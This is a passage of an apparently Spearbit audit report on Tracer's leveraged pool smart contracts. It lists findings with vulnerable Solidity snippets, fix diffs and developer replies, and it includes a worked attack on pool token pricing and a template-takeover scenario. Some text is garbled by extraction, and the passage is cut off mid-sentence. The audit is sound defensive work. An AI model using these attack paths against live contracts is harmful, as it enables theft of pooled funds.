(IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[updateIntervalId].longBurnAmount + _totalCommit[updateIntervalId].longBurnShortMintAmount) ,! The implementation tries to fix this by adding back all tokens burned at this updateIntervalId but it must also add back all tokens that were burned in future commits (i.e. when ID > updateIntervalID). This issue allows an attacker to get a better pool token price and steal pool token funds. Example: Given the preconditions: • long.totalSupply() = 2000 • User owns 1000 long pool tokens • lastPriceTimestamp = 100 • updateInterval = 10 • frontRunningInterval = 5 At time 104: User commits to BurnLong 500 tokens in appropriateUpdateIntervalId = 5. Upon execution user receives a long price of longBalance / (1500 + 500) if no further future commitments are made. Then, as tokens are burned totalPoolCommitments[5].longBurnAmount = 500 and long.totalSupply -= 500. time 106: At 6 as they are now past totalPoolCommitments[6].longBurnAmount = 500, long.totalSupply -= 500 again as tokens are burned. User commits another 500 tokens to BurnLong at appropriateUpdateIntervalId = Now the frontRunningInterval and are scheduled for the next update. the 5th update interval Finally, (IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[5].longBurnAmount + _totalCom- mit[5].longBurnShortMintAmount = longBalance / (1000 + 500) which is a better price than what the user should have received. ID is executed by the pool keeper but at longPrice = longBalance / With a longBalance of 2000, the user receives 500 * (2000 / 1500) = 666.67 tokens executing the first burn commit and 500 * ((2000 - 666.67) / 1500) = 444.43 tokens executing the second one. 5 The total pool balance received by the user is 1111.1/2000 = 55.555% by burning only 1000 / 2000 = 50% of the pool token supply. Recommendation: Pool price computation should take into account all tokens that have been burned, not only the tokens that have been burned in the updateIntervalID of the commit. Note that there can be many pending total commits if frontRunningInterval > updateInterval. Tracer: Valid. Fixed in commit 669a61a. Spearbit: Acknowledged. 5.2 High Risk +5.2.1 No price scaling in SMAOracle Severity: High Risk Context: SMAOracle.sol#L82-L96, ChainlinkOracleWrapper.sol#L36-L60 Description: The update() function of the SMAOracle contract doesn’t scale the latestPrice although a scaler is set in the constructor. On the other hand, the _latestRoundData() function of ChainlinkOracleWrapper contract does scale via toWad(). contract SMAOracle is IOracleWrapper { constructor(..., uint256 _spotDecimals, ...) { ... require(_spotDecimals <= MAX_DECIMALS, "SMA: Decimal precision too high"); ... /* `scaler` is always <= 10^18 and >= 1 so this cast is safe */ scaler = int256(10**(MAX_DECIMALS - _spotDecimals)); ... } function update() internal returns (int256) { /* query the underlying spot price oracle */ IOracleWrapper spotOracle = IOracleWrapper(oracle); int256 latestPrice = spotOracle.getPrice(); ... priceObserver.add(latestPrice); // doesn't scale latestPrice ... } contract ChainlinkOracleWrapper is IOracleWrapper { function getPrice() external view override returns (int256) { (int256 _price, ) = _latestRoundData(); return _price; } function _latestRoundData() internal view returns (int256, uint80) { (..., int256 price, ..) = AggregatorV2V3Interface(oracle).latestRoundData(); ... return (toWad(price), ...); } Recommendation: The latestPrice variable in SMAOracle contract should be scaled, and the toWad() function should be re-introduced. Note: If the SMAOracle is only used with WAD based spot oracles, then _spotDecimals == 18 must be enforced. Tracer: We are submitting PR 406 as a mitigation for this. It is a slightly larger PR than we originally intended so as a result it will likely be submitted for several defects here. We would appreciate if each defect could be assessed against it. Spearbit: Acknowledged. 6 +5.2.2 Two different invariantCheck variables used in PoolFactory.deployPool() Severity: High Risk Context: PoolFactory.sol#L93-L174, IPoolFactory.sol#L14 Description: The deployPool() function in the PoolFactory contract uses two different invariantCheck vari- ables: the one defined as a contract’s instance variable and the one supplied as a parameter. Note: This was also documented in Secureum’s CARE-X report issue "Invariant check incorrectly fixed". function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... poolCommitter.initialize(..., ,! invariantCheck deploymentParameters.invariantCheck, ... ); // version 1 of ... ILeveragedPool.Initialization memory initialization = ILeveragedPool.Initialization({ ... _invariantCheckContract: invariantCheck, // version 2 of invariantCheck ... }); Recommendation: The code should be changed to: function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... poolCommitter.initialize(..., poolCommitter.initialize(..., deploymentParameters.invariantCheck, ... ); invariantCheck, ... ); - + } In addition, the invariantCheck member of struct PoolDeployment in IPoolFactory.sol should be removed to prevent mistakes. Tracer: Valid. Fixed as part of CARE-X commit 98c76bf Spearbit: Acknowledged. +5.2.3 Duplicate user payments for long commits when paid from balance Severity: High Risk Context: PoolCommitter.sol#L299-L306 Description: When minting pool tokens in commit(), the fromAggregateBalance parameter indicates if the user wants to pay from their internal balances or by transferring the tokens. The second if condition is wrong and leads to users having to pay twice when calling commit() with CommitType.LongMint and fromAggregateBalance = true. Recommendation: The second if condition should be changed to only perform the transfer for pool token mints if they have not been already paid from internal balances. -if (commitType == CommitType.LongMint || (commitType == CommitType.ShortMint && !fromAggregateBalance)) { ,! +if ((commitType == CommitType.LongMint || commitType == CommitType.ShortMint) && !fromAggregateBalance) { // minting: pull in the quote token from the committer // Do not need to transfer if minting using aggregate balance tokens, since the leveraged pool already owns these tokens. ,! pool.quoteTokenTransferFrom(msg.sender, leveragedPool, amount); ,! } Tracer: Already fixed in commit 4f2d38f 7 Spearbit: Previously the token transfer was done after the applyCommitment() probably to avoid re-entrancy issues. This behavior is different for non-ERC20 tokens such as ERC777 tokens that give control to the sender and recipient. Is the system intended to support these other token standards? Other than that, it is a valid fix. Tracer: Our system only needs to support ERC20 tokens and our threat model encompasses this invariant. Spearbit: Acknowledged. +5.2.4 Initial executionPrice is too high Severity: High Risk Context: PoolKeeper.sol#L73 Description: When a pool is deployed the initial executionPrice is calculated as firstPrice * 1e18 where firstPrice is ILeveragedPool(_poolAddress).getOraclePrice(): contract PoolKeeper is IPoolKeeper, Ownable { function newPool(address _poolAddress) external override onlyFactory { int256 firstPrice = ILeveragedPool(_poolAddress).getOraclePrice(); int256 startingPrice = ABDKMathQuad.toInt(ABDKMathQuad.mul(ABDKMathQuad.fromInt(firstPrice), ,! FIXED_POINT)); executionPrice[_poolAddress] = startingPrice; } } All other updates to executionPrice use the result of getPriceAndMetadata() directly without scaling: function performUpkeepSinglePool() { ... (int256 latestPrice, ...) = pool.getUpkeepInformation(); ... executionPrice[_pool] = latestPrice; ... } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function getUpkeepInformation() { (int256 _latestPrice, ...) = IOracleWrapper(oracleWrapper).getPriceAndMetadata(); return (_latestPrice, ...); } } The price after the firstPrice will always be lower, therefore its funding rate payment will always go to the shorts and long pool token holders will incur a loss. Recommendation: The 1e18 scaling should be removed for the initial executionPrice - int256 startingPrice = ABDKMathQuad.toInt(ABDKMathQuad.mul(ABDKMathQuad.fromInt(firstPrice), FIXED_POINT)); ,! + int256 startingPrice = firstPrice; Tracer: Valid. Fixed in commit 445377f. Spearbit: Acknowledged. 8 +5.2.5 Paused state can’t be set and therefore withdrawQuote() can’t be executed Severity: High Risk Context: InvariantCheck, LeveragedPool, PoolCommitter Description: The checkInvariants() function of the InvariantCheck contract is called via the modifiers check- InvariantsBeforeFunction() and checkInvariantsAfterFunction() of both LeveragedPool and PoolCommit- ter contracts, and it is meant to pause the contracts if the invariant checks don’t hold. The aforementioned modifiers also contain the require(!paused, "Pool is paused"); statement, which reverts the entire transaction and resets the paused variable that was just set. Furthermore, the paused state can only be set by the InvariantCheck contract due to the onlyInvariantCheck- Contract modifier. Thus the paused variable will never be set to true, making withdrawQuote() impossible to be executed because it requires the contract to be paused. This means that the quote tokens will always stay in the pool even if invariants don’t hold and all other actions are blocked. Relevant parts of the code: The checkInvariants() function calls InvariantCheck.pause() if the invariants don’t hold. The latter calls pause() in LeveragedPool and PoolCommitter: contract InvariantCheck is IInvariantCheck { function checkInvariants(address poolToCheck) external override { ... pause(IPausable(poolToCheck), IPausable(address(poolCommitter))); ... } function pause(IPausable pool, IPausable poolCommitter) internal { pool.pause(); poolCommitter.pause(); } } In LeveragedPool and PoolCommitter contracts, the checkInvariantsBeforeFunction() and checkIn- variantsAfterFunction() modifiers will make the transaction revert if checkInvariants() sets the paused state. contract LeveragedPool is ILeveragedPool, Initializable, IPausable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, "Pool is paused"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, "Pool is paused"); _; invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, "Pool is paused"); // will reset pause again } function pause() external override onlyInvariantCheckContract { // can only called from InvariantCheck paused = true; emit Paused(); } ,! } 9 contract PoolCommitter is IPoolCommitter, Initializable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, "Pool is paused"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, "Pool is paused"); _; invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, "Pool is paused"); // will reset pause again } function pause() external onlyInvariantCheckContract { // can only called from InvariantCheck paused = true; emit Paused(); } Recommendation: This issue is also discussed in modifiers-undermine-contract-pausing and there are a few reasons to reconsider fixing it: • When a transaction triggers an invariant check and it is rolled back due to the revert, other transactions might still be executed. With a paused state this wouldn’t happen. • Pause functionality that doesn’t work is misleading for developers and code reviewers. It is better to delete the dead code, which also saves gas. • withdrawQuote() cannot be executed since the pause state is unreachable. If it is preferable to use the pause functionality, it can be done by having a surrounding contract which stores the pause state and calls the underlying logic with a try mechanism. The underlying logic can then be reverted while the surrounding contract keeps the paused state. Here is an implementation example of a surrounding contract that handles the revert and sets the pause variable. The code that checks the invariants reverts with the InvariantsFail() custom error, which is caught by the try/catch block in the caller and the paused state is set. 10 //SPDX-License-Identifier: MIT pragma solidity 0.8.11; import "hardhat/console.sol"; contract Pool { error InvariantsFail(); function DoSomething() public pure { revert InvariantsFail(); } } contract InvariantCheck { Pool myPool = new Pool(); bool pause; function TryDoSomething() public returns (string memory) { try myPool.DoSomething() catch Error(string memory reason) { return reason; } catch Panic(uint) catch (bytes memory reason) { { return "Ok"; } { return "Panic"; } if (bytes4(reason) == bytes4(abi.encodeWithSignature("InvariantsFail()"))) { pause = true; return("InvariantsFail"); } return "Unknown"; } } constructor() { console.log("Pause =",pause); console.log(TryDoSomething()); console.log("Pause =",pause); } } Note: Beware that this does not interfere with any other functionality. ETH has to be sent back to the caller as this will not be automatically reverted. Tracer: We decided to change how invariant checking works. Instead of checking the invariants on every function call, we now have a contract which can be called at any time by an EOA to do the same invariant checks/pausing. This obviously does not have the same invariant guarantees, as it requires an EOA to start a TX to detect invariant violations, but we decided to make the tradeoff anyway. However, it does mean that this issue should not be relevant anymore, because the paused state can in fact be set. Addressed in PR 384. Spearbit: Acknowledged. 11 5.3 Medium Risk +5.3.1 The value of lastExecutionPrice fails to update if pool.poolUpkeep() reverts Severity: Medium Risk Context: PoolKeeper.sol#L119-L161 Description: The performUpkeepSinglePool() function of the PoolKeeper contract updates executionPrice[] with the latest price and calls pool.poolUpkeep() to process the price difference. However, pool.poolUpkeep() can revert, for example due to the checkInvariantsBeforeFunction modifier in mintTokens(). If pool.poolUpkeep() reverts then the previous price value is lost and the processing will not be accurate. There- fore, it is safer to store the new price only if pool.poolUpkeep() has been executed succesfully. function performUpkeepSinglePool(...) public override { ... int256 lastExecutionPrice = executionPrice[_pool]; executionPrice[_pool] = latestPrice; ... try pool.poolUpkeep(lastExecutionPrice, latestPrice, _boundedIntervals, _numberOfIntervals) { // previous price can get lost if poolUpkeep() reverts ... // executionPrice[_pool] should be updated here } catch Error(string memory reason) { ... } } Recommendation: To prevent losing the latestPrice value, the executionPrice[_pool] variable should be updated only if poolUpkeep() doesn’t revert. function performUpkeepSinglePool(...) public override { - + ... int256 lastExecutionPrice = executionPrice[_pool]; executionPrice[_pool] = latestPrice; ... try pool.poolUpkeep(lastExecutionPrice, latestPrice, _boundedIntervals, _numberOfIntervals) { executionPrice[_pool] = latestPrice; ... } catch Error(string memory reason) { ... } } Alternatively, the administration of the executionPrices could be done within the called poolUpkeep() function of the LeveragedPool contract. Tracer: Valid, fixed in PR 327. Spearbit: Acknowledged. 12 +5.3.2 Pools can be deployed with malicious or incorrect quote tokens and oracles Severity: Medium Risk Context: PoolFactory.sol#L93-L174 Description: The deployment of a pool via deployPool() is permissionless. The deployer provides several pa- rameters that have to be trusted by the users of a specific pool, these parameters include: • oracleWrapper • settlementEthOracle • quoteToken • invariantCheck If any one of them is malicious, then the pool and its value will be affected. Note: Separate findings are made for the deployer check (issue Authenticity check for oracles is not effective) and the invariantCheck (issue Two different invariantCheck variables used in PoolFactory.deployPool() ). Recommendation: Although this is a general risk with permissionless protocols, it is possible to add extra controls (such as allowlists) on quote tokens and the corresponding settlementEthOracle oracle. An additional benefit of allowlisting quote tokens and corresponding oracles is that the oracles could be shared, thus saving gas. Tracer: As decided by the core Tracer team, no allowlists are going to be added. We do agree, though, that there is a risk. To address it without impinging on any degree of permissionlessness, the DAO will be carrying out security checks to give a safety score (akin to Rari protocol’s security checks). Spearbit: Acknowledged. +5.3.3 pairTokenBase and poolBase template contracts instances are not initialized Severity: Medium Risk Context: LeveragedPool.sol#L90-L133 PoolFactory.sol#L66-L81, PoolToken.sol#L9-L14, ERC20_Cloneable.sol#L33-L72, Description: The constructor of PoolFactory contract creates three template contract instances but only one is initialized: poolCommitterBase. The other two contract instances (pairTokenBase and poolBase) are not initial- ized. contract PoolFactory is IPoolFactory, Ownable { constructor(address _feeReceiver) { ... PoolToken pairTokenBase = new PoolToken(DEFAULT_NUM_DECIMALS); // not initialized pairTokenBaseAddress = address(pairTokenBase); LeveragedPool poolBase = new LeveragedPool(); // not initialized poolBaseAddress = address(poolBase); PoolCommitter poolCommitterBase = new PoolCommitter(); // is initialized poolCommitterBaseAddress = address(poolCommitterBase); ... /* initialise base PoolCommitter template (with dummy values) */ poolCommitterBase.initialize(address(this), address(this), address(this), owner(), 0, 0, 0); } This means an attacker can initialize the templates setting them as the owner, and perform owner actions on contracts such as minting tokens. This can be misleading for users of the protocol as these minted tokens seem to be valid tokens. In PoolToken.initialize() an attacker can become the owner by calling initialize() with an address under his control as a parameter. The same can happen in LeveragedPool.initialize() with the initialization parameter. 13 contract PoolToken is ERC20_Cloneable, IPoolToken { ... } contract ERC20_Cloneable is ERC20, Initializable { function initialize(address _pool, ) external initializer { // not called for the template contract owner = _pool; ... } } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ,! // not called for the template contract ... // set the owner of the pool. This is governance when deployed from the factory governance = initialization._owner; } } Recommendation: pairTokenBase and poolBase should be initialized with dummy values. Consider using the upgradable versions of the OpenZeppelin ERC20 contracts, as they don’t have constructors. Tracer: Valid, fixed in PR 396. Spearbit: Acknowledged. +5.3.4 Oracles are not updated before use Severity: Medium Risk Context: PoolKeeper.sol#L71, PoolKeeper.sol#L281 Description: The PoolKeeper contract uses two oracles but does not ensure that their prices are updated. The poll() function should be called on both oracles to get the first execution and the settlement / ETH prices. As it currently is, the code could operate on old data. Recommendation: Price should be updated before using it. Note that calling poll() can revert in certain cases depending on the oracle type if: 1. It does not have enough data to create an SMA 2. Not enough time has passed since it was last updated (require(block.timestamp >= lastUpdate + up- dateInterval, "SMA: Too early to update")) Therefore, it is recommended to add a try {} catch {} block as shown in the code below: 14 function newPool(address _poolAddress) external override onlyFactory { + try IOracleWrapper(ILeveragedPool(_poolAddress).oracleWrapper()).poll() {} catch Error(string memory reason) {} int256 firstPrice = ILeveragedPool(_poolAddress).getOraclePrice(); ... ,! } function performUpkeepSinglePool(...) public override { + ,! ... try pool.poolUpkeep(lastExecutionPrice, latestPrice, _boundedIntervals, _numberOfIntervals) { ... try IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).poll() {} catch Error(string memory reason) {} payKeeper(_pool, gasPrice, gasSpent, savedPreviousUpdatedTimestamp, updateInterval); ... } catch Error(string memory reason) { ... } } Tracer: Regarding the settlementEthOracle, this should be a spot oracle, in which case poll() is a no-op. We are not sure if we should then still include a call to its poll() function. For the pool’s main Oracle wrapper, it is OK to not call the poll() function when the pool is added, because it is polled right when the pool upkeeps. This means the latest poll will get the most up-to-date price. We also now have a ramping-up feature in the SMA oracle when it is populated fewer times than the total number of periods available. Spearbit: Regarding the settlementEthOracle, this should be a spot oracle, in which case poll() is a no-op. We are not sure if we should then still include a call to its poll() function. If spot oracle means ChainlinkOracleWrapper contract instead of SMAOracle, calling poll() for it does not change its state because it is the same as getPrice(). However, the settlementOracle is chosen by the deployer and people might as well deploy a SMAOracle, even if you intend it to be used differently, because your intent is not documented anywhere. In this case, it is better to trigger a poll(), or document that it should be a spot oracle. For the pool’s main oracle wrapper, it is OK to not call the poll() function when the pool is added, because it is polled right when the pool upkeeps, meaning the latest poll will be the most up-to-date price update. We agree that you are already calling poll() on upkeep. This is about calling poll() for the startingPrice in newPool, so the pool’s start price is the latest one. Tracer: We agree that you are already calling poll() on upkeep. This is about calling poll() for the start- ingPrice in newPool, so the pool’s start price is the latest one Good point. Spearbit: The recommendation has been implemented in PR 400 with the addition that if the poll fails, it will also emit a PoolUpkeepError. 15 +5.3.5 getPendingCommits() underreports commits Severity: Medium Risk Context: PoolCommitter.sol#L764 Description: When frontRunningInterval > updateInterval, the PoolCommitter.getAppropriateUpdateIntervalId() function can return updateInterval IDs that are arbitrarily far into the future, especially if appropriateIntervalId > updateIntervalId + 1. Therefore, commits can also be made to these appropriate interval IDs far in the future by calling commit(). The PoolCommitter.getPendingCommits() function only checks the commits for updateIntervalId and updateIn- tervalId + 1, but needs to check up to updateIntervalId + factorDifference + 1. Currently, it is underreporting the pending commits which leads to the checkInvariants function not checking the correct values. Recommendation: The getPendingCommits function should return all possible pending commits even in the case where frontRunningInterval > updateInterval. Tracer: As part of the CARE program, we found that getPendingCommits() can be removed in favour of a running total of pending mints. This was done and merged into the main repository in PR 315 Spearbit: Fix looks good but naming the variable totalPendingMints is a bit ambiguous because: • It sounds like it is a pool token amount but it is a quote token amount. However, the naming for other vars (longMintAmount etc.) never distinguished this either, so at least it is consistent. • It does not include mints from shortBurnLongMint/longBurnShortMint which are also mints. It does not include these because you do not need to track it for the invariant checks. You could add a remark here about the exclusion Tracer: Addressed in issue 368 and PR 403. Spearbit: Variable names were refactored in PR 403, to indicate if they are in settlement tokens or pool tokens. +5.3.6 Authenticity check for oracles is not effective Severity: Medium Risk Context: PoolFactory.sol#L93-L101 Description: The deployPool() function verifies the authenticity of the oracleWrapper by calling its deployer() function. As the oracleWrapper is supplied via deploymentParameters, it can be a malicious contract whose deployer() function can return any value, including msg.sender. Note: this check does protect against frontrunning the deployment transaction of the same pool. See Undocu- mented frontrunning protection. function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, "Deployer must be oracle wrapper owner"); Recommendation: Consider using an allowlist for oracles. Tracer: As decided by the core Tracer team, no allowlists are going to be added. We do agree, though, that there is a risk. To address it without impinging on any degree of permissionlessness, the DAO will be carrying out security checks to give a safety score (akin to Rari protocol’s security checks). Spearbit: Acceptable if it is clearly shown in the user interface. 16 +5.3.7 Incorrect calculation of keeper reward Severity: Medium Risk Context: PoolKeeper.sol#L251-L259 Description: The keeper reward is calculated as (keeperGas * tipPercent / 100) / 1e18. The division by 1e18 is incorrect and undervalues the reward for the keeper. The tip part of the keeper reward is essentially ignored. The likely cause of this miscalculation is based on the note at PoolKeeper.sol#244 which states the tip percent is in WAD units, but it really is a quad representation of a value in the range between 5 and 100. The comment at PoolKeeper.sol#L241 also incorrectly states that _keeperGas is in wei (usually referring to ETH), which is not the case as it is denominated in the quote token, but in WAD precision. Recommendation: The division by FIXED_POINT should be removed, and the comments should be corrected. int256 wadRewardValue = ABDKMathQuad.toInt( ABDKMathQuad.add( ABDKMathQuad.fromUInt(_keeperGas), - ABDKMathQuad.div( ( ABDKMathQuad.div( (ABDKMathQuad.mul(ABDKMathQuad.fromUInt(_keeperGas), _tipPercent)), ABDKMathQuad.fromUInt(100) ) ), FIXED_POINT - - ); ) ) Tracer: Valid, addressed in PR 391 and PR 428. Spearbit: Acknowledged. +5.3.8 performUpkeepSinglePool() can result in a griefing attack when the pool has not been updated for many intervals Severity: Medium Risk Context: executeCommitments() in PoolCommitter Description: Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. This in turn will call executeCommitments() repeatedly. For each call to executeCommitments() the updateMintingFee() function will be called. This updates fees and changes them in an unexpected way. A griefing attack is possible by repeatedly calling executeCommitments() with boundedIntervals == true and numberOfIntervals == 0. Note: Also see issue It is not possible to call executeCommitments() for multiple old commits. It is also important that lastPriceTimestamp is only updated after the last executeCommitments(), otherwise it will revert. 17 function executeCommitments(bool boundedIntervals, uint256 numberOfIntervals) external override ,! onlyPool { ... uint256 upperBound = boundedIntervals ? numberOfIntervals : type(uint256).max; ... while (i < upperBound) { if (block.timestamp >= lastPriceTimestamp + updateInterval * counter) { // ,! lastPriceTimestamp shouldn't be updated too soon ... } } ... updateMintingFee(); // should do this once (in combination with _boundedIntervals==true) ... } Recommendation: Ensure updateMintingFee() is only called once in a series of calls to executeCommitments() with _boundedIntervals == true. Tracer: We want the minting fee to be the most up-to-date whenever anyone commits to a mint. This means we do not need to update it every iteration, but we do want to make sure it is the most up-to-date at the end of the commitment executions. In the case of not executing all update intervals, we think it makes sense to still update the minting fee, so if someone commits to a mint between this call to executeCommitments() and the next, they at least have a minting fee that has been updated since the last update interval. Addressed in PR 413. Spearbit: Acknowledged. +5.3.9 It is not possible to call executeCommitments() for multiple old commits Severity: Medium Risk Context: poolUpkeep() in LeveragedPool Description: Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. In this context the following problem occurs: • In the first run of poolUpkeep(), lastPriceTimestamp will be set to block.timestamp. • In the next run of poolUpkeep(), processing will stop at require(intervalPassed(),..), because block.timestamp hasn’t increased. This means the rest of the commitments won’t be executed by executeCommitments() and updateIntervalId, which is updated in executeCommitments(), will start lagging. 18 function poolUpkeep(..., bool _boundedIntervals, uint256 _numberOfIntervals) external override ,! onlyKeeper { require(intervalPassed(), "Update interval hasn't passed"); // next time lastPriceTimestamp == ,! block.timestamp executePriceChange(_oldPrice, _newPrice); // should only to this once (in combination with ,! _boundedIntervals==true) IPoolCommitter(poolCommitter).executeCommitments(_boundedIntervals, _numberOfIntervals); lastPriceTimestamp = block.timestamp; // shouldn't update until all executeCommitments() are ,! processed } function intervalPassed() public view override returns (bool) { unchecked { return block.timestamp >= lastPriceTimestamp + updateInterval; } } } Recommendation: • Redesign the logic with boundedIntervals (see the related issues) • Update lastPriceTimestamp only once all old commitments are processed. • Ensure executePriceChange() is only executed once for a series of old commitments to prevent negative side effects. Tracer: As part of PR 392, we have a hardcoded limit to avoid running out of gas, but this also solves the user- supplied data problems. Let us know if you think this is a valid solution. Spearbit: Acknowledged. 5.4 Low Risk +5.4.1 Incorrect comparison in getUpdatedAggregateBalance() Severity: Low Risk Context: PoolSwapLibrary.sol#L476-L490 than Description: When the value of data.updateIntervalId accidentally happens to be larger data.currentUpdateIntervalId in the getUpdatedAggregateBalance() function, it will execute the rest of the function, which shouldn’t happen. Although this is unlikely it is also very easy to prevent. function getUpdatedAggregateBalance(UpdateData calldata data) external pure returns (...) { if (data.updateIntervalId == data.currentUpdateIntervalId) { // Update interval has not passed: No change return (0, 0, 0, 0, 0); } } Recommendation: The code should be changed to: function getUpdatedAggregateBalance(UpdateData calldata data) external pure returns (...) { - + } if (data.updateIntervalId == data.currentUpdateIntervalId) { if (data.updateIntervalId >= data.currentUpdateIntervalId) { // Update interval has not passed: No change return (0, 0, 0, 0, 0); } Tracer: Valid, fixed in commit 259386d. Spearbit: Acknowledged. 19 +5.4.2 updateAggregateBalance() can run out of gas Severity: Low Risk Context: PoolCommitter.sol#L609-L682 Description: The updateAggregateBalance() function of the PoolCommitter contract contains a for loop that, in theory, could use up all the gas and result in a revert. The updateAggregateBalance() function checks all future intervals every time it is called and adds them back to the unAggregatedCommitments array, which is checked in the next function call. This would only be a problem if frontRunningInterval is much larger than updateInterval, a situation that seems unlikely in practice. function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... uint256[] memory currentIntervalIds = unAggregatedCommitments[user]; uint256 unAggregatedLength = currentIntervalIds.length; for (uint256 i = 0; i < unAggregatedLength; i++) { uint256 id = currentIntervalIds[i]; ... UserCommitment memory commitment = userCommitments[user][id]; ... if (commitment.updateIntervalId < updateIntervalId) { ... } else { ... storageArrayPlaceHolder.push(currentIntervalIds[i]); // entry for future intervals stays ,! in array } } delete unAggregatedCommitments[user]; unAggregatedCommitments[user] = storageArrayPlaceHolder; ... } Recommendation: An upper limit to the number of future intervals (e.g. frontRunningInterval / updateInter- val) should be set in the initialize() function of LeveragedPool contract. Tracer: Addressed in PR 392. Spearbit: Have you checked MAX_ITERATIONS = type(uint8).max loops is possible within gas limits? updateAggregateBalance() deletes all unAggregatedCommitments[] while there may be some commitments that have not been processed if the limit was reached. getAggregateBalance() does limit the loop so it could give a different result. Tracer: Thanks for raising that. We created this PR addressing it. We also realised PoolSwapLi- brary::appropriateUpdateIntervalId was still buggy when the frontrunning interval is greater than the update interval. Spearbit: It looks good. Some minor suggestions: commitmentIds.pop() can be put after the if statement, as it is executed both in the if and else blocks. is safer to put commitmentIds.length > 1 before the i < commitmentIds.length - 1. It If commitmen- tIds.length happens to be 0 then the statement will revert at commitmentIds.length - 1, although with the current code this will not happen. if (unAggregatedLength > MAX_ITERATIONS && i < commitmentIds.length - 1 && commitmentIds.length > 1) { commitmentIds[i] = commitmentIds[commitmentIds.length - 1]; commitmentIds.pop(); } else { commitmentIds.pop(); } 20 Tracer: We implemented the changes in PR 430. Spearbit: Acknowledged. +5.4.3 Pool information might be lost if setFactory() of PoolKeeper contract is called Severity: Low Risk Context: PoolKeeper.sol#L324-L327, PoolKeeper.sol#L83-L86 Description: The PoolKeeper contract has a function to change the factory: setFactory(). However, calling this function will make previous pools inaccessible for this PoolKeeper unless the new factory imports the pools from the old factory. The isUpkeepRequiredSinglePool() function calls factory.isValidPool(_pool), and it will fail because the new factory doesn’t know about the old pools. As this call is essential for upkeeping, the entire upkeep mechanism will fail. function setFactory(address _factory) external override onlyOwner { factory = IPoolFactory(_factory); ... } function isUpkeepRequiredSinglePool(address _pool) public view override returns (bool) { if (!factory.isValidPool(_pool)) { // might not work if factory is changed return false; } ... } Recommendation: Make sure the implementations of setFactory() and isUpkeepRequiredSinglePool() are correct to specification when the factory is changed. Tracer: Valid, fixed in PR 340. Spearbit: Acknowledged. +5.4.4 Ether could be lost when calling commit() Severity: Low Risk Context: PoolCommitter.sol#L263-L317 Description: The commit() function sends the supplied ETH to makePaidClaimRequest() only if payForClaim == true. If the caller of commit() accidentally sends ETH when payForClaim == false then the ETH stays in the PoolCommitter contract and is effectively lost. Note: This was also documented in Secureum’s CARE Tracking function commit(...) external payable override checkInvariantsAfterFunction { ... if (payForClaim) { autoClaim.makePaidClaimRequest{value: msg.value}(msg.sender); } } Recommendation: Consider changing the code to: 21 function commit(...) external payable override checkInvariantsAfterFunction { ... if (payForClaim) { require(msg.value != 0, "Must pay for claim"); autoClaim.makePaidClaimRequest{value: msg.value}(msg.sender); } else { require(msg.value == 0, "user's ETH would be lost"); } + + } Tracer: Valid, fixed in PR 326. Spearbit: Acknowledged. +5.4.5 Race condition if PoolFactory deploy pools before fees are set Severity: Low Risk Context: PoolFactory, PoolCommitter Description: The deployPool function of PoolFactory contract can deploy pools before the changeInterval value and minting and burning fees are set. This means that fees would not be subtracted. The exact boundaries for the mintingFee, burningFee and changeInterval values aren’t clear. In some parts of the code < 1e18 is used, and in other parts <= 1e18. Furthermore, the initialize() function of the PoolCommitter contract doesn’t check the value of changeInter- val. The setBurningFee(), setMintingFee() and setChangeInterval() functions of PoolCommitter contract don’t check the new values. Finally, two representations of 1e18 are used: 1e18 and PoolSwapLibrary.WAD_PRECISION. contract PoolFactory is IPoolFactory, Ownable { function setMintAndBurnFeeAndChangeInterval(uint256 _mintingFee, uint256 _burningFee,...) ... { ... require(_mintingFee <= 1e18, "Fee cannot be > 100%"); require(_burningFee <= 1e18, "Fee cannot be > 100%"); require(_changeInterval <= 1e18, "Change interval cannot be > 100%"); mintingFee = _mintingFee; burningFee = _burningFee; changeInterval = _changeInterval; ... } function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ,! ... // no check that mintingFee, burningFee, changeInterval are set poolCommitter.initialize(..., mintingFee, burningFee, changeInterval, ...); } } 22 contract PoolCommitter is IPoolCommitter, Initializable { function initialize(... ,uint256 _mintingFee, uint256 _burningFee,... ) ... { ... require(_mintingFee < PoolSwapLibrary.WAD_PRECISION, "Minting fee >= 100%"); require(_burningFee < PoolSwapLibrary.WAD_PRECISION, "Burning fee >= 100%"); ... // no check on _changeInterval mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee); burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee); changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval); ... } function setBurningFee(uint256 _burningFee) external override onlyGov { burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee); // no check on _burningFee ... } function setMintingFee(uint256 _mintingFee) external override onlyGov { mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee); // no check on _mintingFee ... } function setChangeInterval(uint256 _changeInterval) external override onlyGov { changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval); // no check on ,! _changeInterval ... } function updateMintingFee(bytes16 longTokenPrice, bytes16 shortTokenPrice) private { ... if (PoolSwapLibrary.compareDecimals(mintingFee, MAX_MINTING_FEE) == 1) { // mintingFee is greater than 1 (100%). // We want to cap this at a theoretical max of 100% mintingFee = 